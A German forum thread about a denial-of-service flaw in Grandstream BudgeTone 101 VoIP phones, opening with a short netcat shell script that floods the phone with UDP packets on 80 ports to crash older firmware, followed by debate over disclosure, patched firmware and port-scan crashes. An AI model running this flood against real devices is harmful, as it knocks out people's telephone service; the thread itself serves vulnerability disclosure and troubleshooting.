Budgetone 101 anfällig für denial of service

dev-null

Neuer User
Mitglied seit
7 Jun 2004
Beiträge
22
Punkte für Reaktionen
0
Punkte
0
Wenn die IP des Telefons für Angreifer erreichbar ist, kann dieser das Telefon sehr einfach zum Absturz bringen. Es sieht so aus, als könnte das Telefon nicht mehr als 80 parallele UDP Verbindungen verwalten.

Exploit:
Code:
#!/bin/sh

target=192.168.10.9;
i=1;

while [ $i -le 80 ];
do

        echo "$i" ;
        echo "$i" | nc -u $target $i;

        i=`expr $i + 1`;

done;

Erfolgreich getestet mit Firmware:
1.0.4.55, 1.0.4.64, 1.0.4.68

Version 1.0.5.0 scheint nicht betroffen zu sein.
 
das ist vielleicht eine erklärung für die abstürze über die viele user hier klagen.
 
Tja - man kann ja auch seine Firewall entsprechend konfigurieren, daß sowas nicht passieren kann. Dafür sind Firewalls ja auch da. Aber mit Billig-Routern vom Typ D-link, Mentor, Edimax usw. wird das natürlich schwierig. Übrigens kann man das BT101 auch mit der Firmware 1.0.5.0 von außen zum Absturz bringen.

Aber wir sind hier ja nicht im Forum, um Sabotage zu betreiben, sondern weil wir alle mit möglichst großem Erfolg mit den Geräten arbeiten wollen.

Deshalb halte ich solche Anleitungen, um ein Gerät zum Absturz zu bringen, zumindest für fragwürdig :meinemei:
 
wenn man ein grandstream gerät als dmz host eingestellt hat und bei der 24h trennung eine IP abbekommt, die ein vorgänger massiv mit filesharing programmen genutzt hat , kommt noch wochenlang traffic mit sinnlosen anfragen rein.
das wird wohl die ursache sein für die abstürze ...

ich finde es gut das der fehler öffentlich gemacht wird, nur wenn alles transparent ist, weiss man als enduser auch was für gefahren bestehen.

ausserdem ist es nicht so unüblich eine fehlerbeschreibung mit dazugehörigem exploit zu veröffentlichen ... sieh buqtraq mailingliste z.b.
 
@dev-null: Schicke Dein Shellskript doch mal an den Grandstream-Support. Denn es dürfte auch in deren Interesse sein, diese DoS-Geschichte möglichst bald aus der Welt zu schaffen.

Das wir gerade dabei sind - hat mal jemand einen Portscanner auf einen ATA oder ein BT angesetzt? "GrandStream embedded VoIP phone" ist in der nmap-Datenbank vorhanden. Am SPA mit Firmware 2.0.8 bringt nmap 3.50 einen geöffneten Port (http) und ein "No exact OS matches for host". Der ist wahrscheinlich noch zu neu oder zu unbekannt.
 
Die Sache war doch bei Grandstream bekannt. Und wie das oben im Eröffnungsposting dieses Threads steht, ist das Problem doch mit der neuen Firmware behoben.

Was man in der ganzen Diskussion hier nicht aus den Augen verlieren sollte: Wir reden hier über einen TELEFONAPPARAT !

Im übrigen ist der "Fehler" hier nicht neu entdeckt, sondern wurde schon im Internet in verschiedensten Diskussionen mehrfach abgehandelt Google doch einfach mal danach. Auch das obige Skript habe ich schonmal irgendo gesehen :wink:

Aber - wie geaagt - der Fehler ist in 1.0.5.0 nicht mehr vorhanden.
 
exim schrieb:
@dev-null:
[..] Das wir gerade dabei sind - hat mal jemand einen Portscanner auf einen ATA oder ein BT angesetzt?[...]
Ein UDP Portscan bringt meinen ATA sofort zum Absturz :(

Wie hebeda schon schreibt - ein Telefon in der DMZ könnte mit den älteren Firmwares schon Probleme bereiten.

Ich finde es sehr gut wenn wir über das Problem schreiben, selbst wenn bei Google was zu finden ist, der Code vielleicht nicht "neu" ist und das Problem mit der neuen FW behoben ist. ;-)

Genau für diese Diskussionen ist unser Forum ja da, also :) weitermachen :)

Clemens
 
Monsterhase65 schrieb:
Was man in der ganzen Diskussion hier nicht aus den Augen verlieren sollte: Wir reden hier über einen TELEFONAPPARAT !

Von dem man natürlich gerade erwartet, dass er zuverlässig funktioniert...

Monsterhase65 schrieb:
Auch das obige Skript habe ich schonmal irgendo gesehen :wink:

Dann sag doch gleich, dass du [email protected] mitliest. :wink:
Oder hast du doch meinen Rechner gehackt? :?
 
beide Male Monsterhase schrieb:
Übrigens kann man das BT101 auch mit der Firmware 1.0.5.0 von außen zum Absturz bringen.
Aber - wie geaagt - der Fehler ist in 1.0.5.0 nicht mehr vorhanden.

Ich hoffe, die Ursachen für die Abstürze sind nicht identisch (Anzahl Verbindungen).

Ich bin auch der Meinung, dass es hier wenigstens einmal genannt werden MUSS, um bei der Fehlersuche alle Möglichkeiten prüfen zu können. Und da man, wenn man es nicht vermutet, bei Google nicht umbedingt nach diesen Stichwörtern sucht ...

Ist zwar der Grandstream-Thread, aber da wir schon bei dem Thema sind: Ist der SPA2000 sicher in dieser Hinsicht?
 
Robinson schrieb:
beide Male Monsterhase schrieb:
Übrigens kann man das BT101 auch mit der Firmware 1.0.5.0 von außen zum Absturz bringen.
Aber - wie geaagt - der Fehler ist in 1.0.5.0 nicht mehr vorhanden.

Ich hoffe, die Ursachen für die Abstürze sind nicht identisch (Anzahl Verbindungen).

Die 1.0.5.0 scheint 1000 Verbindungen zu können, danach kommt eine Verbindung nicht zustande, und dann gehts weiter. Das Telefon stürzt nicht ab.

Robinson schrieb:
Ich bin auch der Meinung, dass es hier wenigstens einmal genannt werden MUSS, um bei der Fehlersuche alle Möglichkeiten prüfen zu können. Und da man, wenn man es nicht vermutet, bei Google nicht umbedingt nach diesen Stichwörtern sucht ...

Hab gestern kurz gesucht und nichts gefunden. Hat mal wer einen Link?
 
Holen Sie sich 3CX - völlig kostenlos!
Verbinden Sie Ihr Team und Ihre Kunden Telefonie Livechat Videokonferenzen

Gehostet oder selbst-verwaltet. Für bis zu 10 Nutzer dauerhaft kostenlos. Keine Kreditkartendetails erforderlich. Ohne Risiko testen.

3CX
Für diese E-Mail-Adresse besteht bereits ein 3CX-Konto. Sie werden zum Kundenportal weitergeleitet, wo Sie sich anmelden oder Ihr Passwort zurücksetzen können, falls Sie dieses vergessen haben.